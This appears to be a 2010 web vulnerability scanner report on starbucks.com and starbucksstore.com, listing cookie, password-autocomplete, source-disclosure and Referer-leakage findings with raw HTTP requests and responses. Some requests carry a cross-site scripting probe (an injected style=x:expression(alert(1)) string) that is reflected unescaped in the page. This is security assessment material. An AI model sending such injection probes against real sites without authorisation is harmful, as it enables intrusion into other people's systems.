GET /coffee-machines/?CCAID=SBPTPAHPODEA HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21102
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHPODEA; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:05 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...

6.11. http://www.starbucksstore.com/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.asp?CCAID=SBPTPAHP1SHTB&Redir= HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21201
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:50 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...

7. Password field with autocomplete enabled  previous  next
There are 5 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


7.1. http://www.starbucks.com/blog/610/check-in-at-starbucks  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/610/check-in-at-starbucks

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blog/610/check-in-at-starbucks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:19:08 GMT
Connection: close
Content-Length: 65059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<div class="login">
<form action="https://www.starbucks.com/account/signin" class="siren" id="sign-in-form" method="post">
       <fieldset>
...[SNIP]...
</label>
                   <input class="field text medium" id="Account_PassWord" maxlength="200" name="Account.PassWord" tabindex="0" type="password" value="" />
               </li>
...[SNIP]...

7.2. http://www.starbucks.com/blog/611/my-starbucks-idea-s-100-000th-idea  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/611/my-starbucks-idea-s-100-000th-idea

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blog/611/my-starbucks-idea-s-100-000th-idea HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:16:43 GMT
Connection: close
Content-Length: 48282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<div class="login">
<form action="https://www.starbucks.com/account/signin" class="siren" id="sign-in-form" method="post">
       <fieldset>
...[SNIP]...
</label>
                   <input class="field text medium" id="Account_PassWord" maxlength="200" name="Account.PassWord" tabindex="0" type="password" value="" />
               </li>
...[SNIP]...

7.3. http://www.starbucks.com/blog/612/good-books-on-the-starbucks-digital-network  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/612/good-books-on-the-starbucks-digital-network

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blog/612/good-books-on-the-starbucks-digital-network HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:16:03 GMT
Connection: close
Content-Length: 41705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<div class="login">
<form action="https://www.starbucks.com/account/signin" class="siren" id="sign-in-form" method="post">
       <fieldset>
...[SNIP]...
</label>
                   <input class="field text medium" id="Account_PassWord" maxlength="200" name="Account.PassWord" tabindex="0" type="password" value="" />
               </li>
...[SNIP]...

7.4. http://www.starbucks.com/blog/615/i-m-dreaming-of-cranberry-bliss-bar  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/615/i-m-dreaming-of-cranberry-bliss-bar

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blog/615/i-m-dreaming-of-cranberry-bliss-bar HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:14:10 GMT
Connection: close
Content-Length: 39146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<div class="login">
<form action="https://www.starbucks.com/account/signin" class="siren" id="sign-in-form" method="post">
       <fieldset>
...[SNIP]...
</label>
                   <input class="field text medium" id="Account_PassWord" maxlength="200" name="Account.PassWord" tabindex="0" type="password" value="" />
               </li>
...[SNIP]...

7.5. http://www.starbucks.com/blog/616/thanksgiving-blend-fit-for-a-feast  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/616/thanksgiving-blend-fit-for-a-feast

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blog/616/thanksgiving-blend-fit-for-a-feast HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:14:10 GMT
Connection: close
Content-Length: 39234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<div class="login">
<form action="https://www.starbucks.com/account/signin" class="siren" id="sign-in-form" method="post">
       <fieldset>
...[SNIP]...
</label>
                   <input class="field text medium" id="Account_PassWord" maxlength="200" name="Account.PassWord" tabindex="0" type="password" value="" />
               </li>
...[SNIP]...

8. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /include/LibJavaScript.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /include/LibJavaScript.js HTTP/1.1
Accept: */*
Referer: http://www.starbucksstore.com/?CCAID=SBPTPAHP1SHTB&Redir=
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 06 Oct 2008 20:03:29 GMT
Accept-Ranges: bytes
ETag: "654ac299ee27c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:18:41 GMT
Content-Length: 6031


function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x
...[SNIP]...
"/" + theForm.ddYear;
       return SetBirthDate(theForm)
       return CheckDate(bDay, theForm)
           
           
                                       }

function SetBirthDate(theForm)
{
//var ddlMonthID = "<%=ddMonth.ClientID %>", ddDay = "<%=ddDay.ClientID %>", ddYear = "<%=ddYear.ClientID %>";
var BornDOB = "";
//var myMonthStr = parseInt(document.getElementById(ddMonth).value);
//var myDayStr = parseInt(document.getElementById(
...[SNIP]...

9. Cross-domain Referer leakage  previous  next
There are 12 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


9.1. http://www.starbucks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=169adb%20style%3dx%3aexpression(alert(1))%2021e0c039cae HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.starbucks.com
Cookie: ASP.NET_SessionId=new0hf55b2avrbbgt3d0fz45; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:19:51 GMT
Content-Length: 41392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<dd id="get_flash"><a href="http://get.adobe.com/flashplayer/"><img src="/static/images/plugins/get_flashplayer.gif" alt="Get Flash" /></a><a href="http://get.adobe.com/flashplayer/">For an enhanced experience install flash</a>
...[SNIP]...
<li id="community_msi"><a href="http://www.mystarbucksidea.com">Share your ideas on <strong>
...[SNIP]...
<li id="community_facebook"><a href="http://www.facebook.com/starbucks">Find us on <strong>
...[SNIP]...
<li id="community_twitter"><a href="http://www.twitter.com/starbucks">Follow us on <strong>
...[SNIP]...
<h2><a href="http://www.starbucksstore.com/Tours/">Take a Taste Journey</a>
...[SNIP]...
<p style="background-color:#330000"><a href="http://www.starbucksstore.com/Tours/">Learn about the richness and complexity of our coffees & teas through our carefully selected coffee & tea tours.</a>
...[SNIP]...
<p><a href="http://starbucks.tekgroup.com/news/">See All News Headlines</a>
...[SNIP]...
</span>
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=169adb style=x:expression(alert(1)) 21e0c039cae" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...
<div>
       <img class="tracking" src="http://leadback.advertising.com/adcedge/lb?site=695501&amp;srvc=1&amp;betr=starb_cs=1&amp;betq=9909=414691" alt="" />
       
       <object class="tracking" data="https://fls.vulnerable.ad.partner/activityi;src=2206715;type=starb723;cat=starb998;ord=92400215?"></object>
...[SNIP]...

9.2. http://www.starbucks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.starbucks.com
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:17:44 GMT
Content-Length: 41214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<dd id="get_flash"><a href="http://get.adobe.com/flashplayer/"><img src="/static/images/plugins/get_flashplayer.gif" alt="Get Flash" /></a><a href="http://get.adobe.com/flashplayer/">For an enhanced experience install flash</a>
...[SNIP]...
<li id="community_msi"><a href="http://www.mystarbucksidea.com">Share your ideas on <strong>
...[SNIP]...
<li id="community_facebook"><a href="http://www.facebook.com/starbucks">Find us on <strong>
...[SNIP]...
<li id="community_twitter"><a href="http://www.twitter.com/starbucks">Follow us on <strong>
...[SNIP]...
<h2><a href="http://www.starbucksstore.com/Tours/">Take a Taste Journey</a>
...[SNIP]...
<p style="background-color:#330000"><a href="http://www.starbucksstore.com/Tours/">Learn about the richness and complexity of our coffees & teas through our carefully selected coffee & tea tours.</a>
...[SNIP]...
<p><a href="http://starbucks.tekgroup.com/news/">See All News Headlines</a>
...[SNIP]...
</span>
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=1" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>
